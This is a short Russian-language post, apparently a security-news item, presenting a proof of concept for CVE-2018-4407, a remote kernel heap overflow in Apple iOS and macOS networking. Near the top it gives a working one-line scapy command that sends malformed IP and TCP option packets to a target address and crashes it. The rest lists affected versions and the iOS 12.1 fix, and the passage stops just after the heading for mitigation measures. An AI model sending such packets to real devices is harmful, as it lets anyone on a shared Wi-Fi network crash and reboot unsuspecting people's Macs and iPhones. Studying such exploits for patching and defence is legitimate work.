
iOS 12 / OS X удаленное переполнение кучи ядра (CVE-2018-4407) POC
*iOS 12 / OS X Удаленное переполнение кучи ядра (CVE-2018-4407) POC:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Или используйте скрипт
python check_icmp_dos.py 127.0.0.1
Эта уязвимость позволяет злоумышленнику, подключившемуся к той же сети Wi-Fi, отправлять вредоносные пакеты ничего не подозревающим пользователям, что приводит к сбою и перезагрузке любого Mac или iOS-устройства. Поскольку уязвимость находится в сетевом коде ядра системы, никакое антивирусное программное обеспечение не может её предотвратить.
Уязвимы устройства под управлением следующих операционных систем:
Apple iOS 11 и более ранние версии: все устройства (часть устройств, обновлённых до iOS 12)
Apple macOS High Sierra (максимальная затронутая версия 10.13.6): все устройства (исправлено в обновлении безопасности 2018-001)
Apple macOS Sierra (максимальная затронутая версия 10.12.6): все устройства (исправлено в обновлении безопасности 2018-005)
Apple OS X El Capitan и более ранние версии: все устройства
В настоящее время Apple выпустила обновление iOS 12.1, исправляющее данную уязвимость. Пользователям рекомендуется своевременно проверить версию системы и при необходимости принять меры по исправлению. Меры по устранению уязвимости: